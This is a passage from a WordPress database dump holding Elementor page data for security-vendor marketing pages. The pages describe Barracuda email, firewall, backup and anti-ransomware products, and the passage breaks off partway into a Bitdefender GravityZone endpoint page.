URLs.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"147ae8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"92b3892\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/zNkTopX68tk\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(4785,2803,'_elementor_version','0.4'),(4803,2805,'_elementor_version','0.4'),(4806,2806,'_wp_page_template','template-fullwidth.php'),(4807,2806,'_elementor_edit_mode','builder'),(4808,2806,'_elementor_template_type','post'),(4809,2806,'_elementor_data','[{\"id\":\"1f0f085\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"14d59af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b5178a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Barracuda\'s<\\/strong> wide range of high-performance network solutions are specifically designed to protect your threat vectors no matter where they reside. Whether it is a website, email, web application, or mobile device, Barracuda has the tools necessary for you to secure and optimize your network perimeter.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a9478a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8127f88\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"eb3aae7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Email Protection<\\/h3><p>Over 75% of targeted cyber-attacks start with an email. Email-borne attacks interrupt business operations, cause financial damage, and compromise business integrity. Barracuda protects you with multiple layers of protection that includes all aspects of your email infrastructure including gateway defense, email resiliency, fraud protection, and user security awareness.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"faac8d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"87f9ee8\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/HuMxGXS6IxE\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc2e5e3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0bd5ef2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a39876a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Next-Generation Email Security<\\/strong><br \\/>As email-borne attacks have become more prevalent and sophisticated, traditional email security gateways can no longer protect users and data. Many threats, such as spear phishing attacks or emails directed at users via their personal email, bypass gateways.<\\/p><p>While a secure gateway is still necessary, complete email protection also requires a multi-layered defense that stops advanced attacks and protects email data. Barracuda is the only company that combines award-winning email security that can identify phishing emails with user awareness training, archiving, and backup.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4cfe734\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c295d29\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a0b772f\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/ds9fjUyPyoY\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2be372d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"68631e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Network and Application Security<\\/h3><p>Barracuda Cloud Generation network and application firewalls are the industry\'s first solutions purpose-built for cloud connected, on-premises, and hybrid networks. Barracuda protect all your users, applications, and data \\u2013 regardless of what your infrastructure looks like. We ensure secure and reliable connections among multiple sites on premises and the cloud with consumption-based pricing, saving you money on infrastructure costs.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b42f8d2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"87b8c7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e3a791a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Moving from the Data Center to the Public Cloud<\\/strong><\\/p><p>When you migrate your applications to the public cloud, traditional on-premises firewall functionality often doesn\\u2019t translate well to public cloud environments. Cloud Generation Firewalls are designed to provide support for public cloud deployment best practices, support public cloud specific use cases and facilitate you with a commercial model designed for public cloud consumption.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c77287d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6ee6319\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e078579\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Data Protection<\\/h3><p>Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dc0006e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"space_between_widgets\":20},\"elements\":[{\"id\":\"8b37789\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Barracuda Backup<\\/h4><p>Cloud-integrated protection for business-critical data wherever it resides<\\/p><h4>Cloud-to-Cloud Backup<\\/h4><p>Cloud-based backup and recovery to protects Office 365 emails and data from accidental and malicious data loss<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f36f0d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"89998d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5dad7ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Don\\u2019t Be a Ransomware Victim<\\/h2><h3>Ransomware is on the rise. Barracuda\\u2019s multi-layered defense protects your data (and your money).<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"16afbe1\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0a2b893\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c2ff8c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Understanding Ransomware<br \\/>Ransomware is a type of malware that lets attackers find and encrypt your most important data. They then offer to provide the decryption key only if you pay a ransom, within a short time. This is the number one IT security challenge that you face today, with resource-limited small and mid-size businesses the most likely targets.<\\/p><p>Cybercriminals exploit a variety of threat vectors, including email, network traffic, user behavior, and application traffic to insert ransomware. Without a comprehensive security strategy that secures all these vectors, you are almost certain to become a victim.<\\/p><ul><li>47% of businesses have been affected by ransomware.<\\/li><li>The FBI reports that $209 million was paid to ransomware criminals in the first quarter of 2016.<\\/li><li>59% of ransomware infections are delivered via email attachments and embedded URLs.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"147ae8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"92b3892\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/zNkTopX68tk\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"38a9cde\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6089c4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0af1560\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Barracuda provides a complete family of solutions that work together to help you detect, prevent, and recover from ransomware attacks.<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a4c0aee\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"ef21656\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c2ba2a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Detect\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"575ceaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Detect ransomware and other advanced threats, using automated online threat scanners (offered at no charge) and advanced, multi-layer detection technologies including sandbox analysis.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5a62511\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"df80f58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Prevent\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d782d44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Prevent them from infecting your systems, thanks to best-of-breed products to secure your network perimeter, email, web traffic, and outward-facing web applications.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8e73c67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9a5394b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Recover\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dde960b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Recover quickly and easily in case attackers are successful, with state-of-the-art backup solutions that leave attackers with nothing, while you get right back to business.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4810,2806,'_elementor_version','0.4'),(6633,3262,'_wp_page_template','template-fullwidth.php'),(4820,2808,'_wp_page_template','template-fullwidth.php'),(4821,2808,'_elementor_edit_mode','builder'),(4822,2808,'_elementor_template_type','post'),(4823,2808,'_elementor_data','[{\"id\":\"1f0f085\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"14d59af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b5178a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Barracuda\'s<\\/strong> wide range of high-performance network solutions are specifically designed to protect your threat vectors no matter where they reside. Whether it is a website, email, web application, or mobile device, Barracuda has the tools necessary for you to secure and optimize your network perimeter.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a9478a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8127f88\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"eb3aae7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Email Protection<\\/h3><p>Over 75% of targeted cyber-attacks start with an email. Email-borne attacks interrupt business operations, cause financial damage, and compromise business integrity. Barracuda protects you with multiple layers of protection that includes all aspects of your email infrastructure including gateway defense, email resiliency, fraud protection, and user security awareness.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"faac8d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"87f9ee8\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/HuMxGXS6IxE\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc2e5e3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0bd5ef2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a39876a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Next-Generation Email Security<\\/strong><br \\/>As email-borne attacks have become more prevalent and sophisticated, traditional email security gateways can no longer protect users and data. Many threats, such as spear phishing attacks or emails directed at users via their personal email, bypass gateways.<\\/p><p>While a secure gateway is still necessary, complete email protection also requires a multi-layered defense that stops advanced attacks and protects email data. Barracuda is the only company that combines award-winning email security that can identify phishing emails with user awareness training, archiving, and backup.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4cfe734\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c295d29\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a0b772f\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/ds9fjUyPyoY\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2be372d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"68631e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Network and Application Security<\\/h3><p>Barracuda Cloud Generation network and application firewalls are the industry\'s first solutions purpose-built for cloud connected, on-premises, and hybrid networks. Barracuda protect all your users, applications, and data \\u2013 regardless of what your infrastructure looks like. We ensure secure and reliable connections among multiple sites on premises and the cloud with consumption-based pricing, saving you money on infrastructure costs.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b42f8d2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"87b8c7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e3a791a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Moving from the Data Center to the Public Cloud<\\/strong><\\/p><p>When you migrate your applications to the public cloud, traditional on-premises firewall functionality often doesn\\u2019t translate well to public cloud environments. Cloud Generation Firewalls are designed to provide support for public cloud deployment best practices, support public cloud specific use cases and facilitate you with a commercial model designed for public cloud consumption.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c77287d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6ee6319\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e078579\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Data Protection<\\/h3><p>Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dc0006e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"space_between_widgets\":20},\"elements\":[{\"id\":\"8b37789\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Barracuda Backup<\\/h4><p>Cloud-integrated protection for business-critical data wherever it resides<\\/p><h4>Cloud-to-Cloud Backup<\\/h4><p>Cloud-based backup and recovery to protects Office 365 emails and data from accidental and malicious data loss<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f36f0d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"89998d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5dad7ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Don\\u2019t Be a Ransomware Victim<\\/h2><h3>Ransomware is on the rise. Barracuda\\u2019s multi-layered defense protects your data (and your money).<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"16afbe1\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0a2b893\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c2ff8c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Understanding Ransomware<br \\/>Ransomware is a type of malware that lets attackers find and encrypt your most important data. They then offer to provide the decryption key only if you pay a ransom, within a short time. This is the number one IT security challenge that you face today, with resource-limited small and mid-size businesses the most likely targets.<\\/p><p>Cybercriminals exploit a variety of threat vectors, including email, network traffic, user behavior, and application traffic to insert ransomware. Without a comprehensive security strategy that secures all these vectors, you are almost certain to become a victim.<\\/p><ul><li>47% of businesses have been affected by ransomware.<\\/li><li>The FBI reports that $209 million was paid to ransomware criminals in the first quarter of 2016.<\\/li><li>59% of ransomware infections are delivered via email attachments and embedded URLs.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"147ae8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"92b3892\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/zNkTopX68tk\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"38a9cde\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6089c4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0af1560\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Barracuda provides a complete family of solutions that work together to help you detect, prevent, and recover from ransomware attacks.<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a4c0aee\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"ef21656\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c2ba2a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Detect\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"575ceaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Detect ransomware and other advanced threats, using automated online threat scanners (offered at no charge) and advanced, multi-layer detection technologies including sandbox analysis.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5a62511\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"df80f58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Prevent\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d782d44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Prevent them from infecting your systems, thanks to best-of-breed products to secure your network perimeter, email, web traffic, and outward-facing web applications.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8e73c67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9a5394b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Recover\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dde960b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Recover quickly and easily in case attackers are successful, with state-of-the-art backup solutions that leave attackers with nothing, while you get right back to business.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6db2b62\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2001646\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c2f2451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Why is Backup Necessary for Office 365?<\\/h2><p>The number one cause of data loss in a SaaS deployment, such as Microsoft Office 365, is accidental data deletion. In fact, about 70 percent of all lost data is due to either accidental or malicious deletion of data by end-users. Other ways that data can be lost include misconfiguration, client sync issues, and most recently the widespread presence of malware and ransomware, which can render data unusable.<\\/p><p>Although Microsoft Office 365 provides some basic recovery options with the recycle bin and email retention, Microsoft\\u2019s primary focus within Office 365 is ensuring that service and data availability are not disrupted. It is your responsibility to protect the data that you store in the Office 365 cloud. Barracuda Cloud-to-Cloud Backup provides comprehensive, cost-effective, and scalable protection of your Office 365 data \\u2013without adding to your infrastructure costs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e0769b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"02b4dd5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca2ac7d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>What We Protect<\\/h3><p>Barracuda\\u2019s Cloud-to-Cloud Backup Service backs up all of your Office 365 data to secure Barracuda Cloud Storage with no need for on-premises infrastructure. You can back up data on demand or according to an automated schedule. All Exchange Online, SharePoint Online, and OneDrive for Business data is deduplicated and compressed for maximum storage efficiency and reduced backup windows before being stored in the Barracuda Cloud.<\\/p><p>Exchange Online. Barracuda protects the complete folder structure of each user\\u2019s mailbox including all email message and attachments.<br \\/>OneDrive for Business. All files and folders under the Documents Library are protected.<br \\/>SharePoint Online. We protect SharePoint data including Document Libraries, Site Assets, and Picture Libraries within both Team Sites and Public Sites are protected.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c472b20\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4fd4474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Fast and Easy Recovery Options<\\/h3><p>All Office 365 data backed up to the Barracuda Cloud is accessible, searchable, and retrievable from anywhere with an Internet connection. Data can be recovered from the site level down to the individual item level. Messages, folders, or even entire mailboxes and be restored back to the original user and location, to a different location within the account, or to a completely different user account. You can also download items for offline use.<\\/p><p>If you\\u2019re looking for a specific file or message but are unsure of its location, the search feature can be used to find the item quickly and easily. You can also recover data to a specific point in time by selecting the specific dates from a built-in calendar. Recovered data is compressed to minimize download times.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f39b5e8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4141c34\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ae09c83\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Powerful Reporting and Statistics<\\/h3><p>For IT Administrators, detailed reporting and audit logging are a key component of a backup solution. Barracuda Cloud-to-Cloud Backup provides backup status and health monitoring for each backup source. Automated email alerts are delivered after each backup to specified email recipients containing a summary of the backup and detailed information about which email messages, folders, and files were added, modified, and removed since the last backup.<\\/p><p>On the Status page, graphs show the number of items added and amount of data backed up each day. Storage statistics and graphs detail how much data has been backed up overall and the storage efficiency, as well as how much data is actually being stored in the Barracuda Cloud after deduplication and compression. An Audit Log tracks and provides details about every action performed within the Cloud-to-Cloud Backup interface.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4824,2808,'_elementor_version','0.4'),(5009,2851,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:585;s:6:\"height\";i:585;s:4:\"file\";s:18:\"2019/02/Evolve.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Evolve-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"Evolve-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:18:\"Evolve-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:18:\"Evolve-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:18:\"Evolve-585x400.jpg\";s:5:\"width\";i:585;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:16:\"Evolve-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4827,1446,'_elementor_edit_mode','builder'),(4828,1446,'_elementor_template_type','post'),(4833,1448,'_elementor_edit_mode','builder'),(4834,1448,'_elementor_template_type','post'),(4841,2810,'_wp_page_template','template-fullwidth.php'),(4842,2810,'_elementor_edit_mode','builder'),(4843,2810,'_elementor_template_type','post'),(4844,2810,'_elementor_data','[{\"id\":\"f45ae99\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8e3ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2d4b58a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Protect Your Endpoints with Layered Next-Gen Security, now with EDR<\\/h3><h3>It\\u2019s Time to Rethink Endpoint Security<br \\/>Protect Endpoints<\\/h3><p>Organizations around the globe are facing an era of increasingly sophisticated attacks with never before seen global outbreaks of cyber threats. With increasing complexity and mobility of endpoints but limited resources and security staff shortage, companies are falling behind. As a consequence over half of breaches start with a compromised endpoint. It\\u2019s time to rethink endpoint security! <br \\/>Bitdefender developed GravityZone to be an effective defense for enterprise digital assets against the entire range of cyberthreats, from common ones to the most sophisticated cyberthreats. The industry leading prevention that relies on the accurate machine learning technologies and behavior analytics coupled with response automation and the new easy-to-use EDR, delivers un-paralleled protection and threat visibility while keeping the resources and capabilities requirements low.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d48298\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"92610b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"511bcd1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Product\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1968e47\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5621671\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2b3de2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>GravityZone Elite Suite\\u00a0<\\/strong><\\/p><p>Layered next-gen architecture that delivers 